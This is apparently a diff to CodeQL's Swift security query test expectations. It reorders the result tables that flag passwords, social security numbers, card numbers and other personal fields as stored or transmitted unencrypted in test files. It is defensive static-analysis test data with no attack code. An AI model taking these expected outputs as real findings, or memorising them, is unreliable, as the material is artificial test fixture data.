| This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | +| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | +| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | +| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | +| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | +| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | +| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | +| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | +| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | +| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | +| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | +| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | +| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | +| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | +| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:155:66:155:66 | password | password | +| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | +| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | +| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | +| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | +| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | +| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | +| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:173:57:173:57 | password | password | +| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | +| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | +| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | +| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | +| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | +| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | +| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:188:48:188:48 | password | password | +| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | +| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | +| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | +| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | +| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | +| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | +| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:210:85:210:85 | password | password | +| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | +| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | +| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | +| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | +| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | +| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | +| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. 
| testRealm2.swift:33:11:33:11 | CCN | CCN | +| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | +| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | +| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | +| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | +| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | +| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected index fe43c3af8b9b..7665b72b11a6 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected 
+++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected 
@@ -1,35 +1,3 @@ -#select -| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | -| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | -| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | -| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | -| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | -| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. 
| testSend.swift:58:13:58:13 | password | password | -| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | -| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | -| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | -| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | -| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | -| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | -| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. 
| testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | -| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | -| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | -| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | -| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | -| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | -| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | -| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... 
.+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | -| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | -| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | -| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | -| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | -| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | -| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | -| testURL.swift:96:18:96:18 | "..." 
| testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | -| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | -| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | -| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | -| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | provenance | | 
@@ -135,3 +103,35 @@ nodes subpaths | testSend.swift:60:17:60:17 | password | testSend.swift:41:10:41:18 | data | testSend.swift:41:45:41:45 | data | testSend.swift:60:13:60:25 | call to pad(_:) | | testSend.swift:94:27:94:30 | .password | testSend.swift:86:7:86:7 | self | file://:0:0:0:0 | .value | testSend.swift:94:27:94:39 | .value | +#select +| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | +| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | +| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | +| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | +| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. 
| testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | +| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | +| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | +| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | +| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | +| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | +| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | +| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. 
| testSend.swift:77:27:77:30 | .birth_day | .birth_day | +| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | +| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | +| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | +| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | +| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | +| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | +| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... 
.+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | +| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | +| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | +| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | +| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | +| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | +| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | +| testURL.swift:75:18:75:69 | ... .+(_:_:) ... 
| testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | +| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | +| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | +| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | +| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | +| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected index 9c412f25ceeb..c3ed50e498cb 100644 
--- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected
